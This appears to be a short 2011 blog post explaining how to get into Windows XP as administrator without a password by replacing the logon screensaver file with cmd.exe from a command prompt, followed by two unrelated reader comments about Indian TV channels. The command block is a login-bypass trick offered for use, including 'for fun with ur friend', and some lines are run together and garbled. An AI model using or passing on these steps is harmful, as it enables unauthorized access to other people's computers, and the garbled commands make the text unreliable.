Chitika

Friday, January 28, 2011

login to xp without password !!

Hey friends i'l tel u how to login to windows xp as admin without pass

note-this is for educational purposes.....
only
if u forget ur password or for fun with ur friend


so we will start --
when u open ur system on
starting logo click f8 for cmd prompt and type follwing command...
Code:cpp


cd\
cd\windows\system32
mkdir temphack \
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr rename cmd.exe logon.scr
exit 

after typing this u enter in ur new world of
window xp 

2 comments:

  1. Dear Abhay Singh

    I request you to tell me the trick to link your server web to play indian tv channels.
    Frind ! I am Indian My name is Raj Singh living in Long Island, NY. My email is so please help me to play Indian Channels on my Laptop. Be my friend I will appriciate your great help. Please reply.
    Wish you and your family best wishes. Thanks

    ReplyDelete
  2. raj singh on ur request i have posted the steps to use indian channels...

    ReplyDelete